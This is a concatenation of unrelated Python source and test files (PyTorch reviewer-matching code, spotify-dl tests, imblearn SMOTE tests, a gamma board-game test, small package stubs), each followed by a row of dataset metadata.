with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
input_ids = []
print(train_data_sub[0].size())
for i in range(len(labels)):
input_ids.append(train_data_sub[i][0] - train_data_rev[i][0])
print(torch.sigmoid(input_ids[-1]))
prediction = model(torch.stack(input_ids,0), labels=labels)
print(" Test Loss:", prediction[0])
with open(os.path.join(path,"test_results.txt"), "w") as out:
out.write(" Test Loss:" + str(prediction[0]))
out.close()
##
def train_classification(epochs, model, train_data_sub, train_data_rev, labels, save_dir, criterion, optimizer, batch_size, m_name=''):
losses= []
for e_num in range(epochs):
loss_ep = 0
for i in range(0, len(labels), batch_size):
tr_sub, tr_rev, y = get_batch_eval(train_data_sub, train_data_rev, labels, i, batch_size)
optimizer.zero_grad()
prediction = model(tr_sub, tr_rev)
loss = criterion(prediction, y.argmax(dim=1))
loss_ep += loss.item()
loss.backward() # backpropagation, compute gradients
optimizer.step()
losses.append(loss_ep/batch_size)
print("Epoch:", e_num, " Loss:", losses[-1])
print("GPU memory consumption for epoch" + str(e_num) + " " + str(torch.cuda.memory_allocated()))
torch.save(model, os.path.join(save_dir, str(m_name+".model")))
print("Model training completed!!")
def eval_classification(path, train_data_sub, train_data_rev, labels, criterion, m_name, submitter_ids, reviewer_ids):
model = torch.load(os.path.join(path, str(m_name+".model")))
with torch.no_grad():
model.eval()
class_label = 0
trg_label = 0
correct = 0
wrong = 0
loss_test = 0
with open(os.path.join(path,str("test_results"+m_name+".txt")), "w") as out:
for i in range(len(labels)):
#print(tr_sub, y)
prediction = model(train_data_sub[i], train_data_rev[i])
print(prediction, labels[i].unsqueeze(0).argmax(dim=1))
class_label = prediction.argmax(dim=1)
trg_label = labels[i].argmax(dim=-1)
loss = criterion(prediction, labels[i].unsqueeze(0).argmax(dim=1)) # must be (1. nn output, 2. target)
loss_test += loss.item()
if class_label == trg_label:
correct += 1
else:
print(class_label, trg_label)
wrong += 1
out.write(str(submitter_ids[i]) + " " + str(reviewer_ids[i]) + " " + str(class_label.data.cpu()) + " " + str(trg_label.data.cpu()))
print("Accuracy:", correct/len(labels), " Test Loss:", loss_test/len(labels))
out.write("Accuracy:"+ str(correct/len(labels)) + " Test Loss:" + str(loss_test/len(labels)))
out.close()
def seq_cosineSimilarity_paper(reviewer, submitter):
affinity = dict()
for each in submitter.keys():
temp = dict()
for review in reviewer.keys():
if len(reviewer[review]) == 1:
cos = nn.CosineSimilarity(dim=1)
temp[review] = [cos(submitter[each], reviewer[review][0]).numpy()[0]]
else:
cos = nn.CosineSimilarity(dim=1)
if review not in temp:
temp[review] = [cos(submitter[each], reviewer[review][0]).numpy()[0]]
for j in range(1,len(reviewer[review])):
temp[review].append(cos(submitter[each], reviewer[review][j]).numpy()[0])
sorted_scores = sorted(temp[review], key=float, reverse=True)
temp_review = []
if len(sorted_scores) < 5:
temp[review] = sorted_scores
else:
temp[review] = sorted_scores[:5]
if each in affinity.keys():
affinity[each].update(temp)
else:
affinity[each] = temp
return affinity
def seq_cosineSimilarity(reviewer, submitter):
affinity = dict()
for each in submitter.keys():
temp = dict()
for review in reviewer.keys():
if review not in temp:
cos = nn.CosineSimilarity(dim=1)
temp[review] = cos(submitter[each], reviewer[review])[0]
else:
cos = nn.CosineSimilarity(dim=1)
temp[review].update(cos(submitter[each], reviewer[review])[0])
if each in affinity.keys():
affinity[each].update(temp)
else:
affinity[each] = temp
return affinity
#from sklearn.neighbors import NearestNeighbors
#nbrs = NearestNeighbors(n_neighbors=100, algorithm='ball_tree').fit(papers)
#dist, indices = nbrs.kneighbors(papers)
| 46.089974 | 159 | 0.603045 | 2,356 | 17,929 | 4.381155 | 0.081919 | 0.044468 | 0.030227 | 0.027998 | 0.873765 | 0.845185 | 0.836853 | 0.819705 | 0.801395 | 0.797907 | 0 | 0.011352 | 0.263038 | 17,929 | 388 | 160 | 46.208763 | 0.769848 | 0.044899 | 0 | 0.772727 | 0 | 0 | 0.04463 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057576 | false | 0 | 0.027273 | 0 | 0.109091 | 0.084848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
91e9fe27dd70e75b8a878c81cbc4e90bd0eecbea | 811 | py | Python | tests/test_youtube_url.py | gromperen/spotify-dl | b2b22ff0b7d72785b8dfa694f2d6402d228e2c19 | [
"MIT"
] | null | null | null | tests/test_youtube_url.py | gromperen/spotify-dl | b2b22ff0b7d72785b8dfa694f2d6402d228e2c19 | [
"MIT"
] | null | null | null | tests/test_youtube_url.py | gromperen/spotify-dl | b2b22ff0b7d72785b8dfa694f2d6402d228e2c19 | [
"MIT"
] | null | null | null | from spotify_dl.youtube import fetch_youtube_url, get_youtube_dev_key
def test_fetch_youtube_url(capsys):
song_link = fetch_youtube_url("Red Hot Chili Peppers - Dani California [Official Music Video]",
get_youtube_dev_key())
assert song_link == 'https://www.youtube.com/watch?v=Sb5aq5HcS1A'
def test_fetch_youtube_url_wth_scrape(capsys):
song_link = fetch_youtube_url("Red Hot Chili Peppers - Dani California [Official Music Video]", dev_key=None)
assert song_link == 'https://www.youtube.com/watch?v=Sb5aq5HcS1A'
def test_fetch_youtube_url_with_invidious(capsys):
song_link = fetch_youtube_url("Red Hot Chili Peppers - Dani California [Official Music Video]", use_invidious=True)
assert song_link == 'https://www.youtube.com/watch?v=Sb5aq5HcS1A'
| 50.6875 | 119 | 0.748459 | 116 | 811 | 4.922414 | 0.327586 | 0.14711 | 0.183888 | 0.099825 | 0.788091 | 0.749562 | 0.749562 | 0.749562 | 0.749562 | 0.749562 | 0 | 0.013139 | 0.155364 | 811 | 15 | 120 | 54.066667 | 0.820438 | 0 | 0 | 0.272727 | 0 | 0 | 0.388409 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 1 | 0.272727 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37e40026c08456f144223019e40edcb183800611 | 133 | py | Python | doltcli/tag_mixin.py | TannerAMay/doltcli | 0d073d65a20530f40e25fd696629d473600a634c | [
"Apache-2.0"
] | null | null | null | doltcli/tag_mixin.py | TannerAMay/doltcli | 0d073d65a20530f40e25fd696629d473600a634c | [
"Apache-2.0"
] | null | null | null | doltcli/tag_mixin.py | TannerAMay/doltcli | 0d073d65a20530f40e25fd696629d473600a634c | [
"Apache-2.0"
] | null | null | null | class TagMixin:
def list_tag(self):
pass
def create_tag(self):
pass
def delete_tag(self):
pass
| 13.3 | 25 | 0.556391 | 17 | 133 | 4.176471 | 0.529412 | 0.295775 | 0.464789 | 0.394366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.368421 | 133 | 9 | 26 | 14.777778 | 0.845238 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.428571 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
37e92938cd947993d7214d619cf6cdac8b84d883 | 122 | py | Python | S02 - Data Wrangling/BLU03 - Data Sources/utils/__init__.py | jtiagosg/batch3-students | 5eb94bee46625881e9470da2b137aaa0f6cf7912 | [
"MIT"
] | 12 | 2019-07-06T09:06:17.000Z | 2020-11-13T00:58:42.000Z | S02 - Data Wrangling/BLU03 - Data Sources/utils/__init__.py | jtiagosg/batch3-students | 5eb94bee46625881e9470da2b137aaa0f6cf7912 | [
"MIT"
] | 29 | 2019-07-01T14:19:49.000Z | 2021-03-24T13:29:50.000Z | S02 - Data Wrangling/BLU03 - Data Sources/utils/__init__.py | jtiagosg/batch3-students | 5eb94bee46625881e9470da2b137aaa0f6cf7912 | [
"MIT"
] | 36 | 2019-07-05T15:53:35.000Z | 2021-07-04T04:18:02.000Z | from .friendly_prints import friendly_print_string, friendly_print_vat, friendly_print_beers, friendly_print_soup_children | 122 | 122 | 0.918033 | 17 | 122 | 6 | 0.588235 | 0.509804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04918 | 122 | 1 | 122 | 122 | 0.87931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
5346c39fd1a636fd03f8b49a5e315f7b837ceefc | 11,857 | py | Python | imblearn/over_sampling/tests/test_smote.py | seabay/UnbalancedDataset | b15b868019343052d4b57bf748d658367166c8b3 | [
"MIT"
] | 1 | 2018-07-11T06:47:11.000Z | 2018-07-11T06:47:11.000Z | imblearn/over_sampling/tests/test_smote.py | seabay/UnbalancedDataset | b15b868019343052d4b57bf748d658367166c8b3 | [
"MIT"
] | null | null | null | imblearn/over_sampling/tests/test_smote.py | seabay/UnbalancedDataset | b15b868019343052d4b57bf748d658367166c8b3 | [
"MIT"
] | null | null | null | """Test the module SMOTE."""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# Christos Aridas
# License: MIT
from __future__ import print_function
import numpy as np
from pytest import raises
from sklearn.utils.testing import assert_allclose, assert_array_equal
from sklearn.neighbors import NearestNeighbors
from sklearn.svm import SVC
from imblearn.over_sampling import SMOTE
RND_SEED = 0
X = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956,
-0.49283504], [-0.28162401, -2.10400981],
[0.83680821,
1.72827342], [0.3084254, 0.33299982], [0.70472253, -0.73309052],
[0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234]])
Y = np.array([0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0])
R_TOL = 1e-4
def test_smote_wrong_kind():
kind = 'rnd'
smote = SMOTE(kind=kind, random_state=RND_SEED)
with raises(ValueError, match="Unknown kind for SMOTE"):
smote.fit_sample(X, Y)
def test_sample_regular():
kind = 'regular'
smote = SMOTE(random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234],
[0.29307743, -0.14670439], [0.84976473, -0.15570176],
[0.61319159, -0.11571668], [0.66052536, -0.28246517]])
y_gt = np.array([
0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0
])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_regular_half():
sampling_strategy = {0: 9, 1: 12}
kind = 'regular'
smote = SMOTE(
sampling_strategy=sampling_strategy, random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049],
[-0.41635887, -0.38299653], [0.08711622, 0.93259929],
[1.70580611, -0.11219234], [0.36784496, -0.1953161]])
y_gt = np.array(
[0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_borderline1():
kind = 'borderline1'
smote = SMOTE(random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234],
[0.3765279, -0.2009615], [0.55276636, -0.10550373],
[0.45413452, -0.08883319], [1.21118683, -0.22817957]])
y_gt = np.array([
0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0
])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_borderline2():
kind = 'borderline2'
smote = SMOTE(random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049],
[-0.41635887, -0.38299653], [0.08711622, 0.93259929],
[1.70580611, -0.11219234], [0.47436888, -0.2645749],
[1.07844561, -0.19435291], [0.33339622, 0.49870937]])
y_gt = np.array(
[0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_svm():
kind = 'svm'
smote = SMOTE(random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049],
[-0.41635887, -0.38299653], [0.08711622, 0.93259929],
[1.70580611, -0.11219234], [0.47436888, -0.2645749],
[1.07844561, -0.19435291], [1.44015515, -1.30621303]])
y_gt = np.array(
[0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_fit_sample_nn_obj():
kind = 'borderline1'
nn_m = NearestNeighbors(n_neighbors=11)
nn_k = NearestNeighbors(n_neighbors=6)
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, m_neighbors=nn_m)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234],
[0.3765279, -0.2009615], [0.55276636, -0.10550373],
[0.45413452, -0.08883319], [1.21118683, -0.22817957]])
y_gt = np.array([
0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0
])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_regular_with_nn():
kind = 'regular'
nn_k = NearestNeighbors(n_neighbors=6)
smote = SMOTE(random_state=RND_SEED, kind=kind, k_neighbors=nn_k)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234],
[0.29307743, -0.14670439], [0.84976473, -0.15570176],
[0.61319159, -0.11571668], [0.66052536, -0.28246517]])
y_gt = np.array([
0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0
])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_wrong_nn():
kind = 'borderline1'
nn_m = 'rnd'
nn_k = NearestNeighbors(n_neighbors=6)
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, m_neighbors=nn_m)
with raises(ValueError, match="has to be one of"):
smote.fit_sample(X, Y)
nn_k = 'rnd'
nn_m = NearestNeighbors(n_neighbors=10)
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, m_neighbors=nn_m)
with raises(ValueError, match="has to be one of"):
smote.fit_sample(X, Y)
kind = 'regular'
nn_k = 'rnd'
smote = SMOTE(random_state=RND_SEED, kind=kind, k_neighbors=nn_k)
with raises(ValueError, match="has to be one of"):
smote.fit_sample(X, Y)
def test_sample_regular_with_nn_svm():
kind = 'svm'
nn_k = NearestNeighbors(n_neighbors=6)
svm = SVC(random_state=RND_SEED)
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, svm_estimator=svm)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049],
[-0.41635887, -0.38299653], [0.08711622, 0.93259929],
[1.70580611, -0.11219234], [0.47436888, -0.2645749],
[1.07844561, -0.19435291], [1.44015515, -1.30621303]])
y_gt = np.array(
[0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_regular_wrong_svm():
kind = 'svm'
nn_k = NearestNeighbors(n_neighbors=6)
svm = 'rnd'
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, svm_estimator=svm)
with raises(ValueError, match="has to be one of"):
smote.fit_sample(X, Y)
| 42.346429 | 79 | 0.589188 | 1,728 | 11,857 | 3.913773 | 0.087963 | 0.021292 | 0.023954 | 0.021292 | 0.890877 | 0.882301 | 0.880526 | 0.880526 | 0.880526 | 0.872246 | 0 | 0.427458 | 0.231509 | 11,857 | 279 | 80 | 42.498208 | 0.31475 | 0.009615 | 0 | 0.82996 | 0 | 0 | 0.015509 | 0 | 0 | 0 | 0 | 0 | 0.068826 | 1 | 0.044534 | false | 0 | 0.02834 | 0 | 0.072874 | 0.004049 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5364bfc73122723a39f26ac6c152831db82f9e79 | 4,389 | py | Python | z2/part3/updated_part2_batch/jm/parser_errors_2/202972000.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 1 | 2020-04-16T12:13:47.000Z | 2020-04-16T12:13:47.000Z | z2/part3/updated_part2_batch/jm/parser_errors_2/202972000.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:50:15.000Z | 2020-05-19T14:58:30.000Z | z2/part3/updated_part2_batch/jm/parser_errors_2/202972000.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:45:13.000Z | 2020-06-09T19:18:31.000Z | from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 202972000
"""
"""
random actions, total chaos
"""
board = gamma_new(5, 5, 3, 10)
assert board is not None
assert gamma_move(board, 2, 4, 1) == 1
assert gamma_free_fields(board, 2) == 24
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 2, 3) == 1
assert gamma_move(board, 1, 2, 0) == 1
assert gamma_move(board, 1, 2, 1) == 1
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_move(board, 2, 4, 0) == 1
assert gamma_busy_fields(board, 2) == 3
assert gamma_free_fields(board, 2) == 19
assert gamma_move(board, 3, 3, 1) == 1
assert gamma_move(board, 1, 0, 1) == 1
assert gamma_move(board, 1, 1, 2) == 1
assert gamma_free_fields(board, 1) == 16
assert gamma_golden_possible(board, 1) == 1
assert gamma_free_fields(board, 2) == 16
assert gamma_move(board, 3, 0, 0) == 1
assert gamma_move(board, 3, 0, 2) == 1
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 1, 3, 4) == 1
assert gamma_move(board, 1, 1, 0) == 1
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 2, 1, 4) == 1
board627339973 = gamma_board(board)
assert board627339973 is not None
assert board627339973 == (".2.1.\n" "2.3..\n" "31...\n" "1.132\n" "311.2\n")
del board627339973
board627339973 = None
assert gamma_move(board, 3, 2, 4) == 1
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_move(board, 1, 4, 4) == 1
assert gamma_busy_fields(board, 1) == 7
assert gamma_move(board, 2, 2, 2) == 1
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 1, 1, 1) == 1
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_golden_move(board, 2, 0, 1) == 1
assert gamma_move(board, 3, 3, 4) == 0
assert gamma_busy_fields(board, 3) == 5
assert gamma_move(board, 1, 3, 2) == 1
assert gamma_busy_fields(board, 1) == 8
assert gamma_move(board, 2, 2, 4) == 0
assert gamma_free_fields(board, 2) == 6
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 3, 0, 0) == 0
assert gamma_busy_fields(board, 1) == 8
assert gamma_move(board, 2, 3, 1) == 0
assert gamma_golden_move(board, 2, 0, 0) == 0
assert gamma_move(board, 3, 3, 4) == 0
assert gamma_move(board, 3, 3, 3) == 1
assert gamma_move(board, 1, 3, 4) == 0
assert gamma_move(board, 1, 1, 2) == 0
assert gamma_move(board, 2, 0, 4) == 1
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 0, 3) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 2, 4) == 0
assert gamma_free_fields(board, 2) == 4
assert gamma_move(board, 3, 0, 2) == 0
assert gamma_move(board, 1, 2, 4) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 3, 3) == 0
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_move(board, 2, 2, 2) == 0
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_busy_fields(board, 2) == 7
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_busy_fields(board, 3) == 6
assert gamma_free_fields(board, 1) == 4
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 3, 0, 3) == 0
assert gamma_move(board, 3, 1, 4) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 4, 4) == 0
board172176651 = gamma_board(board)
assert board172176651 is not None
assert board172176651 == ("22311\n" "2.33.\n" "3121.\n" "21132\n" "311.2\n")
del board172176651
board172176651 = None
assert gamma_move(board, 2, 3, 3) == 0
assert gamma_move(board, 3, 3, 4) == 0
assert gamma_move(board, 3, 4, 4) == 0
assert gamma_free_fields(board, 3) == 4
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 4, 4) == 0
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_busy_fields(board, 2) == 7
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_move(board, 3, 1, 4) == 0
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_golden_move(board, 1, 3, 0) == 0
assert gamma_move(board, 2, 3, 1) == 0
gamma_delete(board)
| 33.25 | 76 | 0.67692 | 822 | 4,389 | 3.451338 | 0.059611 | 0.356715 | 0.359535 | 0.47938 | 0.826225 | 0.806486 | 0.723299 | 0.584068 | 0.5178 | 0.498061 | 0 | 0.12817 | 0.164502 | 4,389 | 131 | 77 | 33.503817 | 0.645487 | 0 | 0 | 0.382609 | 0 | 0 | 0.016275 | 0 | 0 | 0 | 0 | 0 | 0.843478 | 1 | 0 | false | 0 | 0.008696 | 0 | 0.008696 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5367bcd2cb3726f822b27dbcd3fc22d4185ba7d9 | 191 | py | Python | screens/__init__.py | osava-nsit/osava | 28b972d12a3c3420753ade560f628da35e9d592d | [
"Apache-2.0"
] | 34 | 2017-02-05T12:08:05.000Z | 2022-01-26T17:49:13.000Z | screens/__init__.py | osava-nsit/osava | 28b972d12a3c3420753ade560f628da35e9d592d | [
"Apache-2.0"
] | 1 | 2017-02-07T18:25:42.000Z | 2017-02-07T19:26:21.000Z | screens/__init__.py | osava-nsit/osava | 28b972d12a3c3420753ade560f628da35e9d592d | [
"Apache-2.0"
] | 2 | 2017-03-31T09:11:36.000Z | 2021-06-25T16:59:48.000Z | from cpu_screens import *
from deadlock_avoidance_screens import *
from deadlock_detection_screens import *
from disk_screens import *
from memory_screens import *
from page_screens import *
